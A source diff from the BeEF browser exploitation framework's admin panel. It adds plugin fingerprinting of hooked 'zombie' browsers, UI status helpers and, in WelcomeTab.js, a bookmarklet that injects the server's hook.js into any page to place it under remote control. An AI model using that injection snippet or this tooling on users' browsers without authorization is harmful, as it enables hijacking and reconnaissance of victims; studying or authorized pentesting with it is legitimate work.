-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the zombie browser window size
-    window_size = BD.get(zombie_session, 'WindowSize')
-    if not window_size.nil?
-
-      window_size_hash = JSON.parse(window_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
-      width = window_size_hash['width']
-      (print_error "width is wrong type";return) if not width.is_a?(Fixnum)
-      height = window_size_hash['height']
-      (print_error "height is wrong type";return) if not height.is_a?(Fixnum)
-
-      # construct the string to be displayed in the details tab
-      encoded_window_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s)
-      encoded_window_size_hash = { 'Window Size' => encoded_window_size }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_window_size_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for JavaEnabled
-    java_enabled = BD.get(zombie_session, 'JavaEnabled')
-    if not java_enabled.nil?
-      encoded_java_enabled = CGI.escapeHTML(java_enabled)
-      encoded_java_enabled_hash = { 'Java Enabled' => encoded_java_enabled }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_java_enabled_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for VBScriptEnabled
-    vbscript_enabled = BD.get(zombie_session, 'VBScriptEnabled')
-    if not vbscript_enabled.nil?
-      encoded_vbscript_enabled = CGI.escapeHTML(vbscript_enabled)
-      encoded_vbscript_enabled_hash = { 'VBScript Enabled' => encoded_vbscript_enabled }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_vbscript_enabled_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasFlash
-    has_flash = BD.get(zombie_session, 'HasFlash')
-    if not has_flash.nil?
-      encoded_has_flash = CGI.escapeHTML(has_flash)
-      encoded_has_flash_hash = { 'Has Flash' => encoded_has_flash }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_flash_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for hasPhonegap
-    has_phonegap = BD.get(zombie_session, 'hasPhonegap')
-    if not has_phonegap.nil?
-      encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
-      encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_phonegap_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasGoogleGears
-    has_googlegears = BD.get(zombie_session, 'HasGoogleGears')
-    if not has_googlegears.nil?
-      encoded_has_googlegears = CGI.escapeHTML(has_googlegears)
-      encoded_has_googlegears_hash = { 'Has GoogleGears' => encoded_has_googlegears }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_googlegears_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasWebSocket
-    has_web_socket = BD.get(zombie_session, 'HasWebSocket')
-    if not has_web_socket.nil?
-      encoded_has_web_socket = CGI.escapeHTML(has_web_socket)
-      encoded_has_web_socket_hash = { 'Has WebSockets' => encoded_has_web_socket }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_web_socket_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasActiveX
-    has_activex = BD.get(zombie_session, 'HasActiveX')
-    if not has_activex.nil?
-      encoded_has_activex = CGI.escapeHTML(has_activex)
-      encoded_has_activex_hash = { 'Has ActiveX' => encoded_has_activex }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_activex_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for hasSessionCookies
-    has_session_cookies = BD.get(zombie_session, 'hasSessionCookies')
-    if not has_session_cookies.nil?
-      encoded_has_session_cookies = CGI.escapeHTML(has_session_cookies)
-      encoded_has_session_cookies_hash = { 'Session Cookies' => encoded_has_session_cookies }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_session_cookies_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for hasPersistentCookies
-    has_persistent_cookies = BD.get(zombie_session, 'hasPersistentCookies')
-    if not has_persistent_cookies.nil?
-      encoded_has_persistent_cookies = CGI.escapeHTML(has_persistent_cookies)
-      encoded_has_persistent_cookies_hash = { 'Persistent Cookies' => encoded_has_persistent_cookies }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_persistent_cookies_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
- 
-    @body = summary_grid_hash.to_json  
+    @body = summary_grid_hash.to_json
   end
-      
+
   # Returns the list of all command_modules in a JSON format
   def select_all_command_modules
     @body = command_modules2json(BeEF::Modules.get_enabled.keys)
@@ -562,10 +266,10 @@ class Modules < BeEF::Extension::AdminUI::HttpController
   #Recursive function to sort all the parent's children
   def sort_recursive_tree(parent)
     # sort the children nodes by status and name
-    parent.each {|x| 
+    parent.each {|x|
       #print_info "Sorting: " + x['children'].to_s
       if x.is_a?(Hash) and x.has_key?('children')
-        x['children'] = x['children'].sort_by {|a| 
+        x['children'] = x['children'].sort_by {|a|
           fldr = a['cls'] ? a['cls'] : 'zzzzz'
           "#{fldr}#{a['status']}#{a['text']}"
         }
@@ -649,20 +353,20 @@ class Modules < BeEF::Extension::AdminUI::HttpController
          update_command_module_tree(tree, dyn_mod_category, command_module_icon_path, command_module_status, command_mod_name,dyn_mod.id)
        }
     end
-      
-    # sort the parent array nodes 
+
+    # sort the parent array nodes
     tree.sort! {|a,b| a['text'] <=> b['text']}
-    
+
     sort_recursive_tree(tree)
 
     retitle_recursive_tree(tree)
-    
 
-      
+
+
     # return a JSON array of hashes
     @body = tree.to_json
   end
-  
+
   # Returns the inputs definition of an command_module.
   def select_command_module
     command_module_id = @params['command_module_id'] || nil
@@ -677,7 +381,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
        @body = command_modules2json([key])
     end
   end
-  
+
   # Returns the list of commands for an command_module
   def select_command_module_commands
     commands = []
@@ -692,32 +396,32 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     nonce = @params['nonce'] || nil
     (print_error "nonce is nil";return) if nonce.nil?
     (print_error "nonce incorrect";return) if @session.get_nonce != nonce
-    
+
     # get the browser id
     zombie = Z.first(:session => zombie_session)
     (print_error "Zombie is nil";return) if zombie.nil?
     zombie_id = zombie.id
     (print_error "Zombie id is nil";return) if zombie_id.nil?
-      
+
     C.all(:command_module_id => command_module_id, :hooked_browser_id => zombie_id).each do |command|
       commands.push({
-        'id' => i, 
-        'object_id' => command.id, 
-        'creationdate' => Time.at(command.creationdate.to_i).strftime("%Y-%m-%d %H:%M").to_s, 
+        'id' => i,
+        'object_id' => command.id,
+        'creationdate' => Time.at(command.creationdate.to_i).strftime("%Y-%m-%d %H:%M").to_s,
         'label' => command.label
         })
       i+=1
     end
-      
+
     @body = {
-      'success' => 'true', 
+      'success' => 'true',
       'commands' => commands}.to_json
-      
+
   end
-  
+
   # Attaches an command_module to a zombie.
   def attach_command_module
-    
+
     definition = {}
 
     # get params
@@ -729,8 +433,8 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     nonce = @params['nonce'] || nil
     (print_error "nonce is nil";return) if nonce.nil?
     (print_error "nonce incorrect";return) if @session.get_nonce != nonce
-    
-    @params.keys.each {|param| 
+
+    @params.keys.each {|param|
       (print_error "invalid key param string";return) if not BeEF::Filters.has_valid_param_chars?(param)
       (print_error "first char is num";return) if BeEF::Filters.first_char_is_num?(param)
       definition[param[4..-1]] = params[param]
@@ -749,10 +453,10 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     exec_results = BeEF::Module.execute(mod_key, zombie_session, def2)
     @body = (exec_results != nil) ? '{success: true}' : '{success: false}'
   end
-  
+
   # Re-execute an command_module to a zombie.
   def reexecute_command_module
-    
+
     # get params
     command_id = @params['command_id'] || nil
     (print_error "Command id is nil";return) if command_id.nil?
@@ -762,15 +466,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     nonce = @params['nonce'] || nil
     (print_error "nonce is nil";return) if nonce.nil?
     (print_error "nonce incorrect";return) if @session.get_nonce != nonce
-    
+
     command.instructions_sent = false
     command.save
-    
+
     @body = '{success : true}'
   end
 
   def attach_dynamic_command_module
-    
+
     definition = {}
 
     # get params
@@ -782,8 +486,8 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     nonce = @params['nonce'] || nil
     (print_error "nonce is nil";return) if nonce.nil?
     (print_error "nonce incorrect";return) if @session.get_nonce != nonce
-    
-    @params.keys.each {|param| 
+
+    @params.keys.each {|param|
       (print_error "invalid key param string";return) if not BeEF::Filters.has_valid_param_chars?(param)
       (print_error "first char is num";return) if BeEF::Filters.first_char_is_num?(param)
       definition[param[4..-1]] = params[param]
@@ -825,11 +529,11 @@ class Modules < BeEF::Extension::AdminUI::HttpController
 
 
   end
-  
+
   # Returns the results of a command
   def select_command_results
     results = []
-    
+
     # get params
     command_id = @params['command_id']|| nil
     (print_error "Command id is nil";return) if command_id.nil?
@@ -839,24 +543,24 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     # get command_module
     command_module = BeEF::Core::Models::CommandModule.first(:id => command.command_module_id)
     (print_error "command_module is nil";return) if command_module.nil?
-    
+
     resultsdb = BeEF::Core::Models::Result.all(:command_id => command_id)
     (print_error "Command id result is nil";return) if resultsdb.nil?
-    
+
     resultsdb.each{ |result| results.push({'date' => result.date, 'data' => JSON.parse(result.data)}) }
-    
+
     @body = {
-      'success'             => 'true', 
+      'success'             => 'true',
       'command_module_name' => command_module.name,
       'command_module_id'   => command_module.id,
       'results'             => results}.to_json
 
   end
-  
+
   # Returns the definition of a command.
   # In other words it returns the command that was used to command_module a zombie.
   def select_command
-    
+
     # get params
     command_id = @params['command_id'] || nil
     (print_error "Command id is nil";return) if command_id.nil?
@@ -873,9 +577,9 @@ class Modules < BeEF::Extension::AdminUI::HttpController
       command_module_name = command_module.name
       e = BeEF::Core::Command.const_get(command_module_name.capitalize).new(command_module_name)
     end
-            
+
     @body = {
-      'success' => 'true', 
+      'success' => 'true',
       'command_module_name'  => command_module_name,
       'command_module_id'    => command_module.id,
       'data'                 => BeEF::Module.get_options(command_module_name),
@@ -883,9 +587,9 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     }.to_json
 
   end
-  
+
   private
-  
+
   # Takes a list of command_modules and returns them as a JSON array
   def command_modules2json(command_modules)
     command_modules_json = {}
@@ -901,7 +605,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
         command_modules_json[i] = h
         i += 1
     end
-    
+
     if not command_modules_json.empty?
       return {'success' => 'true', 'command_modules' => command_modules_json}.to_json
     else
@@ -912,15 +616,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController
   # return the input requred for the module in JSON format
   def dynamic_modules2json(id)
     command_modules_json = {}
-    
+
     mod = BeEF::Core::Models::CommandModule.first(:id => id)
 
     # if the module id is not in the database return false
     return {'success' => 'false'}.to_json if(not mod)
-    
+
     # the path will equal Dynamic/<type> and this will get just the type
 		dynamic_type = mod.path.split("/").last
-		
+
     e = BeEF::Modules::Commands.const_get(dynamic_type.capitalize).new
     e.update_info(mod.id)
     e.update_data()
@@ -947,7 +651,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     return {'success' => 'true', 'command_modules' => payload_options_json}.to_json
 
   end
-  
+
 end
 
 end

extensions/admin_ui/controllers/panel/index.html

@@ -13,12 +13,16 @@
 	<%= script_tag 'ext-base.js' %>
 	<%= script_tag 'ext-all.js' %>
 	<%= script_tag 'ext-beef.js' %>
+
 	<!-- jQuery encoder (ESAPI way) -->
 	<%= script_tag 'esapi/jquery-1.6.4.min.js' %>
 	<%= script_tag 'esapi/Class.create.js' %>
 	<%= script_tag 'esapi/jquery-encoder-0.1.0.js' %>
 	<script type="text/javascript" language="JavaScript">var $jEncoder = jQuery.noConflict();</script>
-	<!--/ jQuery encoder (ESAPI way) -->
+
+    <!-- BeEF Web UI common functions-->
+    <%= script_tag 'ui/common/beef_common.js' %>
+
 	<%= script_tag 'ux/TabCloseMenu.js' %>
 	<%= script_tag 'ux/StatusBar.js' %>
 	<%= script_tag 'ux/PagingStore.js' %>
@@ -37,7 +41,7 @@
     <%= stylesheet_tag 'wterm.css' %>
     <script type="text/javascript" language="JavaScript">var $jwterm = jQuery.noConflict();</script>
     <%= script_tag 'ui/panel/tabs/ZombieTabIpec.js' %>
-
+    <%= script_tag 'ui/panel/tabs/ZombieTabAutorun.js' %>
     <%= script_tag 'ui/panel/PanelViewer.js' %>
 	<%= script_tag 'ui/panel/DataGrid.js' %>
 	<%= script_tag 'ui/panel/MainPanel.js' %>
@@ -45,7 +49,6 @@
 	<%= script_tag 'ui/panel/ZombieTabs.js' %>
 	<%= script_tag 'ui/panel/zombiesTreeList.js' %>
 	<%= script_tag 'ui/panel/ZombiesMgr.js' %>
-	
 	<%= script_tag 'ui/panel/Logout.js' %>
 	<%= script_tag 'ui/panel/WelcomeTab.js' %>
 	<!-- <%= script_tag 'ui/panel/HackVertorTab.js' %> -->
@@ -57,6 +60,8 @@
 <body>
 	<%= nonce_tag %>	
 	<div id="header">
+		<div class="left-menu" id="header-right">
+		</div>
 		<div class="right-menu">
 			<img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" /> 
 			BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> | 

extensions/admin_ui/controllers/panel/panel.rb

@@ -76,37 +76,53 @@ module BeEF
           # create a hash of simple hooked browser details
           def get_simple_hooked_browser_hash(hooked_browser)
 
-            browser_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName')
+            browser_name    = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName')
             browser_version = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserVersion')
-            browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
-            os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
-            os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName')
-            hw_icon = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session)
-            hw_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware')
-            domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
-            has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
+            browser_icon    = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
+            os_icon         = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
+            os_name         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName')
+            hw_icon         = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session)
+            hw_name         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware')
+            domain          = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
+            has_flash       = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
             has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
             has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
-            has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
-            date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
+            has_java        = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
+            has_webrtc      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebRTC')
+            has_activex     = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
+            has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
+            has_quicktime   = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
+            has_realplayer  = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasRealPlayer')
+            has_wmp         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWMP') 
+            has_vlc         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasVLC')
+            has_foxit       = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFoxit')
+            date_stamp      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
 
             return {
-                'session' => hooked_browser.session,
-                'ip' => hooked_browser.ip,
-                'domain' => domain,
-                'port' => hooked_browser.port.to_s,
-                'browser_name' => browser_name,
+                'session'         => hooked_browser.session,
+                'ip'              => hooked_browser.ip,
+                'domain'          => domain,
+                'port'            => hooked_browser.port.to_s,
+                'browser_name'    => browser_name,
                 'browser_version' => browser_version,
-                'browser_icon' => browser_icon,
-                'os_icon' => os_icon,
-                'os_name' => os_name,
-                'hw_icon' => hw_icon,
-                'hw_name' => hw_name,
-                'has_flash' => has_flash,
+                'browser_icon'    => browser_icon,
+                'os_icon'         => os_icon,
+                'os_name'         => os_name,
+                'hw_icon'         => hw_icon,
+                'hw_name'         => hw_name,
+                'has_flash'       => has_flash,
                 'has_web_sockets' => has_web_sockets,
                 'has_googlegears' => has_googlegears,
-                'has_java' => has_java,
-                'date_stamp' => date_stamp
+                'has_java'        => has_java,
+                'has_webrtc'      => has_webrtc,
+                'has_activex'     => has_activex,
+                'has_silverlight' => has_silverlight,
+                'has_quicktime'   => has_quicktime,
+                'has_wmp'         => has_wmp,
+                'has_vlc'         => has_vlc,
+                'has_foxit'       => has_foxit,
+                'has_realplayer'  => has_realplayer,
+                'date_stamp'      => date_stamp
             }
 
           end

extensions/admin_ui/media/css/base.css

@@ -5,13 +5,24 @@
  */
 
 #header .right-menu {
+	width: 300px;
 	float: right;
-	margin: 10px;
+	margin: 3px 3px 0 4px;
 	word-spacing: 5px;
 	font: 11px arial, tahoma, verdana, helvetica;
 	color:#000;
 }
 
+#header .left-menu {
+	width: 300px;
+	float: left;
+	margin: 10px 4px 0 20px;
+	word-spacing: 5px;
+	font: 11px arial, tahoma, verdana, helvetica;
+	font-weight: bolder;
+	color:red;
+}
+
 #header a:link,
 #header a:visited {
 	color:#000;

extensions/admin_ui/media/javascript/ui/common/beef_common.js

@@ -0,0 +1,44 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*!
+ * BeEF Web UI commons
+ */
+
+if(typeof beefwui === 'undefined' && typeof window.beefwui === 'undefined') {
+
+    var BeefWUI = {
+
+        rest_token: "",
+
+        /**
+         * Retrieve the token needed to call the RESTful API.
+         * This is obviously a post-auth call.
+         */
+        get_rest_token: function() {
+            if(this.rest_token.length == 0){
+                var url = "/ui/modules/getRestfulApiToken.json";
+                jQuery.ajax({
+                    contentType: 'application/json',
+                    dataType: 'json',
+                    type: 'GET',
+                    url: url,
+                    async: false,
+                    processData: false,
+                    success: function(data){
+                        beefwui.rest_token = data.token;
+                    },
+                    error: function(){
+                        beefwui.rest_token = "";
+                    }
+                });
+            }
+            return this.rest_token;
+        }
+    };
+
+    window.beefwui = BeefWUI;
+}

extensions/admin_ui/media/javascript/ui/panel/DataGrid.js

@@ -18,10 +18,10 @@ DataGrid = function(url, page, base) {
         storeId: 'myStore',
         baseParams: this.base,
         idProperty: 'id',
-        fields: ['id','type','event','date'],
+        fields: ['id','type','event','date','hooked_browser_id'],
         totalProperty: 'count',
         remoteSort: false,
-        sortInfo: {field: "date", direction: "DESC"}
+        sortInfo: {field: "id", direction: "DESC"}
     });
 
     this.bbar = new Ext.PagingToolbar({
@@ -35,16 +35,17 @@ DataGrid = function(url, page, base) {
     this.columns = [{
 			id: 'log-id',
 			header: 'Id',
-			hidden: true,
+			hidden: false,
 			dataIndex: 'id',
-			sortable: false
+			sortable: true,
+			width: 20
 		}, {
 			id: 'log-type',
 			header: "Type",
 			dataIndex: 'type',
 			sortable: true,
 			width: 60,
-			renderer: function(value, metaData, record, rowIndex, colIndex, store) {
+			renderer: function(value) {
 				return "<b>" + $jEncoder.encoder.encodeForHTML(value) + "</b>";
 			}
 		}, {
@@ -53,7 +54,9 @@ DataGrid = function(url, page, base) {
 			dataIndex: 'event',
 			sortable:true,
 			width: 420,
-			renderer: $jEncoder.encoder.encodeForHTML(this.formatTitle)
+			renderer: function(value){
+                return $jEncoder.encoder.encodeForHTML(value);
+            }
 		}, {
 			id: 'log-date',
 			header: "Date",
@@ -61,6 +64,12 @@ DataGrid = function(url, page, base) {
 			width: 80,
 			renderer:  $jEncoder.encoder.encodeForHTML(this.formatDate),
 			sortable:true
+		}, {
+			id: 'log-browser',
+			header: "Browser ID",
+			dataIndex: 'hooked_browser_id',
+			sortable: true,
+			width: 35
     }];
 
     DataGrid.superclass.constructor.call(this, {
@@ -78,7 +87,7 @@ DataGrid = function(url, page, base) {
 		
 		listeners: {
 			afterrender: function(datagrid) {
-				datagrid.store.reload({params:{start:0, limit:datagrid.page, sort:"date", dir:"DESC"}});
+				datagrid.store.reload({params:{start:0, limit:datagrid.page, sort:"id", dir:"DESC"}});
 			}
 		}
     });

extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js

@@ -42,19 +42,39 @@ Ext.onReady(function() {
  * This event updater retrieves updates every 8 seconds. Those updates
  * are then pushed to various managers (i.e. the zombie manager).
  */
+var lastpoll = new Date().getTime();
+
 Ext.TaskMgr.start({
 	run: function() {
 		Ext.Ajax.request({
 			url: '/ui/panel/hooked-browser-tree-update.json',
 			method: 'POST',
 			success: function(response) {
-				var updates = Ext.util.JSON.decode(response.responseText);
+				var updates;
+				try {
+					updates = Ext.util.JSON.decode(response.responseText);
+				} catch (e) {
+					//The framework has probably been reset and you're actually logged out
+					var hr = document.getElementById("header-right");
+					hr.innerHTML = "You appear to be logged out. <a href='/ui/panel/'>Login</a>";
+				}
 				var distributed_engine_rules = (updates['ditributed-engine-rules']) ? updates['ditributed-engine-rules'] : null;
 				var hooked_browsers = (updates['hooked-browsers']) ? updates['hooked-browsers'] : null;
 				
 				if(zombiesManager && hooked_browsers) {
 					zombiesManager.updateZombies(hooked_browsers, distributed_engine_rules);
 				}
+				lastpoll = new Date().getTime();
+				var hr = document.getElementById("header-right");
+				hr.innerHTML = "";
+			},
+			failure: function(response) {
+				var timenow = new Date().getTime();
+
+				if ((timenow - lastpoll) > 60000) {
+					var hr = document.getElementById("header-right");
+					hr.innerHTML = "Framework is down";
+				}
 			}
 		});
 	},

extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js

@@ -6,6 +6,10 @@
 
 WelcomeTab = function() {
 
+    var hookURL = location.protocol+'%2f%2f'+location.hostname+(location.port ? ':'+location.port : '')+'%2fhook.js';
+    var bookmarklet = "javascript:%20(function%20()%20{%20var%20url%20=%20%27__HOOKURL__%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();"
+    bookmarklet = bookmarklet.replace(/__HOOKURL__/,hookURL);
+
     welcome = " \
               <div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' > \
               <p><img src='/ui/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
@@ -13,6 +17,7 @@ WelcomeTab = function() {
               <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Getting Started</span></p><br />\
               <p>Welcome to BeEF!</p><br /> \
               <p>Before being able to fully explore the framework you will have to 'hook' a browser. To begin with you can point a browser towards the basic demo page <a href='/demos/basic.html' target='_blank'>here</a>, or the advanced version <a href='/demos/butcher/index.html' target='_blank'>here</a>.</p><br /> \
+              <p>If you want to hook ANY page (for debugging reasons of course), drag the following bookmarklet link into your browser's bookmark bar, then simply click the shortcut on another page: <a href='__BOOKMARKLETURL__'>Hook Me!</a></p><br /> \
               <p>After a browser is hooked into the framework they will appear in the 'Hooked Browsers' panel on the left. Hooked browsers will appear in either an online or offline state, depending on how recently they have polled the framework.</p><br /> \
               <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Hooked Browsers</span></p><br />\
               <p>To interact with a hooked browser simply left-click it, a new tab will appear. \
@@ -46,7 +51,9 @@ WelcomeTab = function() {
               </div>\
               ";
 
-    WelcomeTab.superclass.constructor.call(this, {
+  welcome = welcome.replace(/__BOOKMARKLETURL__/,bookmarklet);
+
+  WelcomeTab.superclass.constructor.call(this, {
 	region:'center',
 	padding:'10 10 10 10',
 	html: welcome,

extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js

@@ -5,16 +5,14 @@
 //
 
 ZombieTab = function(zombie) {
-	
 	main_tab = new ZombieTab_DetailsTab(zombie);
 	log_tab = new ZombieTab_LogTab(zombie);
 	commands_tab = new ZombieTab_Commands(zombie);
 	requester_tab = new ZombieTab_Requester(zombie);
     xssrays_tab =  new ZombieTab_XssRaysTab(zombie);
     ipec_tab = new ZombieTab_IpecTab(zombie);
-
-
-    ZombieTab.superclass.constructor.call(this, {
+    autorun_tab = new ZombieTab_Autorun(zombie);
+	ZombieTab.superclass.constructor.call(this, {
         id:"current-browser",
 		activeTab: 0,
 		loadMask: {msg:'Loading browser...'},
@@ -25,7 +23,13 @@ ZombieTab = function(zombie) {
 			forceFit: true,
 			type: 'fit'
 		},
-		items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab, ipec_tab]
+		items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab, ipec_tab, autorun_tab],
+        listeners:{
+            afterrender:function(component){
+                // Hide auto-run tab
+                component.hideTabStripItem(autorun_tab);
+            }
+        }
 	});
 };
 

extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js

@@ -5,10 +5,10 @@
 //
 
 var ZombiesMgr = function(zombies_tree_lists) {
-	
+
 	//save the list of trees in the object
 	this.zombies_tree_lists = zombies_tree_lists;
-	
+
 	// this is a helper class to create a zombie object from a JSON hash index
 	this.zombieFactory = function(index, zombie_array){
 
@@ -26,7 +26,15 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		var has_flash          = zombie_array[index]["has_flash"];
 		var has_web_sockets    = zombie_array[index]["has_web_sockets"];
 		var has_googlegears    = zombie_array[index]["has_googlegears"];
-        var has_java           = zombie_array[index]["has_java"];
+		var has_java           = zombie_array[index]["has_java"];
+		var has_webrtc         = zombie_array[index]["has_webrtc"];
+		var has_activex        = zombie_array[index]["has_activex"];
+		var has_wmp            = zombie_array[index]["has_wmp"]; 
+		var has_vlc            = zombie_array[index]["has_vlc"];
+		var has_foxit          = zombie_array[index]["has_foxit"];
+		var has_silverlight    = zombie_array[index]["has_silverlight"];
+		var has_quicktime      = zombie_array[index]["has_quicktime"];
+		var has_realplayer     = zombie_array[index]["has_realplayer"];
 		var date_stamp         = zombie_array[index]["date_stamp"];
 
 		text = "<img src='/ui/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
@@ -40,11 +48,19 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		balloon_text+= "<br/>Hardware: "       + hw_name;
 		balloon_text+= "<br/>Domain: "         + domain + ":" + port;
 		balloon_text+= "<br/>Flash: "          + has_flash;
-        balloon_text+= "<br/>Java: "           + has_java;
-        balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
+		balloon_text+= "<br/>Java: "           + has_java;
+		balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
+		balloon_text+= "<br/>WebRTC: "         + has_webrtc;
+		balloon_text+= "<br/>ActiveX: "        + has_activex;
+		balloon_text+= "<br/>Silverlight: "    + has_silverlight;
+		balloon_text+= "<br/>QuickTime: "      + has_quicktime;
+		balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp; 
+		balloon_text+= "<br/>VLC: "            + has_vlc;
+		balloon_text+= "<br/>Foxit: "          + has_foxit;
+		balloon_text+= "<br/>RealPlayer: "     + has_realplayer;
 		balloon_text+= "<br/>Google Gears: "   + has_googlegears;
 		balloon_text+= "<br/>Date: "           + date_stamp;
-		
+
 		var new_zombie = {
 			'id'           : index,
 			'ip'           : ip,
@@ -53,12 +69,12 @@ var ZombiesMgr = function(zombies_tree_lists) {
 			'balloon_text' : balloon_text,
 			'check'        : false,
 			'domain'       : domain,
-            'port'         : port
+			'port'         : port
 		};
-		
+
 		return new_zombie;
 	}
-	
+
 	/*
 	 * Update the hooked browser trees
 	 * @param: {Literal Object} an object containing the list of offline and online hooked browsers.
@@ -67,33 +83,33 @@ var ZombiesMgr = function(zombies_tree_lists) {
 	this.updateZombies = function(zombies, rules){
 		var offline_hooked_browsers = zombies["offline"];
 		var online_hooked_browsers = zombies["online"];
-		
+
 		for(tree_type in this.zombies_tree_lists) {
 			hooked_browsers_tree = this.zombies_tree_lists[tree_type];
-			
+
 			//we compare and remove the hooked browsers from online and offline branches for each tree.
 			hooked_browsers_tree.compareAndRemove(zombies);
-			
+
 			//add an offline browser to the tree
 			for(var i in offline_hooked_browsers) {
 				var offline_hooked_browser = this.zombieFactory(i, offline_hooked_browsers);
